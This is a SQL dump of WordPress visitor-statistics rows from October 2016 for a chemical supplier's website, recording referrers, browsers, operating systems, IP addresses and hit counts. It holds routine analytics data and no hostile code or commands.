INSERT INTO `wp_statistics_visitor` VALUES (6610, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6611, '2016-10-20', 'https://www.google.com/search?q=krytox&oq=krytox&gs_l=mobile-heirloom-serp.3..41l3j0l2.113.1725.0.2830.3.3.0.0.0.0.496.911.0j1j0j1j1.3.0....0...1c.1.34.mobile-heirloom-serp..1.2.608.slci1517KhM', 'Firefox', 'Android', '49.0', '', '174.199.14.173', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6612, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.74.68.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6613, '2016-10-20', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '70.209.128.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6614, '2016-10-20', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '54.0.2840.59', '', '32.218.123.55', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6615, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.218.130.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6616, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.69.245.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6617, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.39.53.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6618, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.170.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6619, '2016-10-20', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6620, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6621, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6622, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '190.103.67.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6623, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.85.68.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6624, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '35.160.69.8', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6625, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '10.136.1.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6626, '2016-10-20', 'https://mschem.com/robots.txt', 'Firefox', 'Windows', '28.0', '', '104.236.244.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6627, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.190.236.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6628, '2016-10-20', 'https://www.miller-stephenson.com/product/epikure-w/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.174.133.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6629, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '125.161.106.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6630, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '119.104.116.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6631, '2016-10-20', 'https://www.miller-stephenson.com', 'WhatWeb', 'Unknown', '0.4.8', '', '58.23.9.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6632, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6633, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6634, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.240', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6635, '2016-10-20', 'https://www.miller-stephenson.com/about-miller-stephenson/', 'MSIE', 'Windows', '9.0', '', '204.79.180.212', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6636, '2016-10-20', 'https://www.google.com', 'Firefox', 'Windows', '43.0', '', '124.81.69.66', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6637, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.239.187.179', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6638, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '49.0.2623.112', '', '69.35.243.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6639, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.22.138.179', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6640, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.125.164.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6641, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '118.47.50.228', '000', 37, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6642, '2016-10-20', 'https://www.spacetechexpo.com/visit/exhibitor-list-2017', 'Chrome', 'Windows', '53.0.2785.143', '', '111.93.119.134', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6643, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '111.93.119.134', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6644, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.0.204.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6645, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.113.224.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6646, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.238.201.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6647, '2016-10-20', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=67&print=y', 'MSIE', 'Windows', '9.0', '', '182.118.25.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6648, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.44.168.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6649, '2016-10-20', 'https://www.miller-stephenson.com/npb-and-hcfc-225-replacements/', 'Chrome', 'Macintosh', '39.0.2171.95', '', '75.76.248.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6650, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.23.22.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6651, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Android', '52.0.2743.98', '', '166.170.5.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6652, '2016-10-20', 'https://www.google.ca/', 'Safari', 'iPad', '9.0', '', '70.67.43.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6653, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.180.244.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6654, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.20.33.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6655, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.64.231.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6656, '2016-10-20', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '70.140.17.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6657, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.234.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6658, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.27.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6659, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/', 'Safari', 'iPhone', '7.0', '', '131.253.25.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6660, '2016-10-20', 'https://mmr.mschem.com/', 'Opera', 'Windows', '12.16', '', '125.94.4.166', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6661, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '19.0.1061.1', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6662, '2016-10-20', 'https://www.google.com.tw/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiNv4TC0ujPAhXCrlQKHUXCChsQFggaMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '118.163.114.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6663, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.201.205.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6664, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.188.157.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6665, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.168.96.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6666, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.43.212.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6667, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.228.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6668, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.193.108.40', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6669, '2016-10-20', 'https://www.google.pl/', 'Firefox', 'Windows', '49.0', '', '212.160.184.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6670, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/', 'Firefox', 'Windows', '49.0', '', '91.193.121.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6671, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.50.1.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6672, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/', 'Chrome', 'Windows', '54.0.2840.59', '', '68.4.115.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6673, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.73.146.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6674, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '45.45.193.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6675, '2016-10-20', 'https://www.miller-stephenson.com', 'Mojolicious', 'Unknown', 'Unknown', '', '71.63.70.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6676, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6677, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6678, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.66.157.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6679, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.54.161.214', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6680, '2016-10-20', 'https://www.google.co.in', 'Firefox', 'Linux', '47.0', '', '14.141.89.18', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6681, '2016-10-20', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '47.0', '', '115.248.35.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6682, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6683, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '202.156.146.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6684, '2016-10-20', 'https://www.google.com.sg/', 'Chrome', 'Windows', '53.0.2785.143', '', '34.185.10.52', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6685, '2016-10-20', 'https://www.miller-stephenson.com/product/opteon-suprion/', 'Firefox', 'Linux', '47.0', '', '115.178.100.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6686, '2016-10-20', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0ahUKEwjiqZWp3ujPAhWHq1QKHREFC0o4ChAWCFMwBw&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-64-radical-initiator%2F&usg=AFQjCNFSn_9whraBhhuvpb2uyL5Gz7-R8Q&bvm=bv.136499718,d.cGw', 'MSIE', 'Windows', '11.0', '', '211.171.133.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6687, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.193.121.78', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6688, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.36.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6689, '2016-10-20', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1215.x65GAq3bVmWrzrjsMwUM_PZECk_Oo-YZyPEoG1Nx0MaS2snO31hT6cMTxh8h2xaA.a06344c46a137f34ad3cd146d64218513b028544&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVF8wbmdBTUJnQ1pBbzZCY2R5eF9mWmJGMHVGd09BNEdaSEs5aThQUnR4dGJ4MVZEaDNlR1dTUQ&b64e=2&sign=6678eb031beba426f108431225dcf21d&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbi-39jk0iTwA0hUgC7cFf4cYZFd6EzjcCHwiNp-Gb4ijnOEhJtnprtdQZjnKw3sOUcQBc5_DM8wyU04QJywPy5yCZzD03GR7uAbnd5yQClTJEOi4oJzpTWiw&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVLVIUOk4qiEHfB_W6PETphadtSUv2JiiHDjBDJBApXRfEho53GgU53qeCkf3t79wgfDFonZCtxpQL1dN0NZCEi&l10n=ru&cts=1476944181803&mc=3.71677504301', 'Chrome', 'Windows', '31.0.1650.63', '', '93.80.145.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6690, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.113.125.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6691, '2016-10-20', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '58.107.181.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6692, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.103.215.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6693, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.21.28.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6694, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CFEQFjAG&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=vWYIWO3GJPHmyQPjFQ&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'Safari', 'iPhone', '10.0', '', '66.102.6.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6695, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.49.28.255', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6696, '2016-10-20', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.3', '', '199.193.253.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6697, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.251.128', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6698, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.190.114.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6699, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.60.183.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6700, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.123.252.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6701, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6702, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6703, '2016-10-20', 'https://cn.bing.com/search?q=MS-111+epoxy+stripper&qs=n&form=QBRE&pq=ms-111+epoxy+stripper&sc=0-21&sp=-1&sk=&cvid=00AB3D858A6D47BF97C196B44599333E', 'Edge', 'Windows', '14.14393', '', '180.174.217.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6704, '2016-10-20', 'https://www.google.it/', 'Chrome', 'Windows', '53.0.2785.143', '', '95.242.210.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6705, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.160.191.195', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6706, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.194.243.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6707, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '175.138.7.239', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6708, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.220.236.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6709, '2016-10-20', 'https://www.google.co.in/', 'Firefox', 'Windows', '49.0', '', '111.93.191.254', '000', 32, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6710, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '207.183.246.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6711, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/?gclid=CMrAqo_q6M8CFYeEfgodR9ABlQ', 'MSIE', 'Windows', '8.0', '', '207.183.246.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6712, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.100.88.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6713, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.193.155.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6714, '2016-10-20', 'https://www.google.pl', 'Firefox', 'Windows', '47.0', '', '5.172.237.3', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6715, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.253.22.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6716, '2016-10-20', 'https://www.miller-stephenson.com', 'Screaming', 'Unknown', 'Unknown', '', '31.168.110.29', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6717, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.242.254.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6718, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.150.218.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6719, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.150.255.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6720, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6721, '2016-10-20', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwi-tcvZ9OjPAhWKbhQKHfvEAAQQFghaMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67-radical-initiator%2F&usg=AFQjCNF6JQqQTvTAJszhPay_5GmxN2I4Hw', 'MSIE', 'Windows', '11.0', '', '10.21.25.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6722, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.141.78.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6723, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6724, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.44.77.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6725, '2016-10-20', 'https://www.miller-stephenson.com/contact_us.aspx', 'Chrome', 'Windows', '48.0.2564.109', '', '117.253.173.202', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6726, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.18.204.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6727, '2016-10-20', 'https://www.google.com.eg/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '196.154.113.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6728, '2016-10-20', 'https://www.photorepair.ru/', 'Opera', 'Windows', '9.00', '', '46.118.155.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6729, '2016-10-20', 'https://www.google.co.uk/', 'Chrome', 'Windows', '47.0.2526.80', '', '62.252.203.34', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6730, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '38.0', '', '115.178.100.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6731, '2016-10-20', 'https://www.miller-stephenson.com/chemical-products/', 'Firefox', 'Linux', '38.0', '', '14.141.89.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6732, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.3.211.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6733, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.201.237.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6734, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.218.128.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6735, '2016-10-20', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1215.l7QLuj0zBEWnIXQL6xQDvrZhKaarywf8jsltc1bG7KOlXxZDDKH4c38IutaXzhtG.207617e95eebc3e54f96474a15b1b085ee1300ec&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhZeXhETXl3bnZYeDNkc1hvTVBLam8tY1VSSmJQRlB0cVdDVk4yQVdyejZMWDlaZGVkam9XZ19vZFdPQzUyT3JNYWplVGdnMHNoay1ZU09FdjByMmYzOWxBUmtSQUl1QlFB&b64e=2&sign=23631250dec1d838771a65180f35fead&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbarJpZrWg0NsiyYpf2TJulZ8_5hDFX7CHbmBRUxl1sfPQ-PkLGQcvN2P6r9mZMUzFFaEhCgHFHtvn0lEfdYUkoBCIiZ0vHp6D9yU7r-6c3fYgCrGzIqetXHaoylYRiV2YG&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWLmUMpz38pRDvkhewm8ml3N_tHtTg2OXrXKJhMrKgFmEyXCsFVFY8JAjLR1S-JrJ_DfBJqGT_Lq8qSdOykk-c4dg43XHkMJC8&l10n=ru&cts=1476951583582&mc=5.66747831327', 'Chrome', 'Windows', '28.0.1500.95', '', '176.195.127.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6736, '2016-10-20', 'https://cn.bing.com/search?q=heloxy+48&go=%E6%90%9C%E7%B4%A2&qs=bs&form=QBRE', 'Edge', 'Windows', '14.14393', '', '112.254.46.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6737, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.167.150.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6738, '2016-10-20', 'https://www.miller-stephenson.com/wp-login.php', 'Firefox', 'Windows', '34.0', '', '95.167.150.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6739, '2016-10-20', 'https://www.google.ch/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiMnu7I_ujPAhXGVxQKHScBAzwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw&sig2=045Zk8gR0kXGRn6r7P6TdA&bvm=bv.136499718,d.bGg', 'MSIE', 'Windows', '11.0', '', '164.14.128.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6740, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.22.55.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6741, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.173.87.46', '000', 1, 0); 
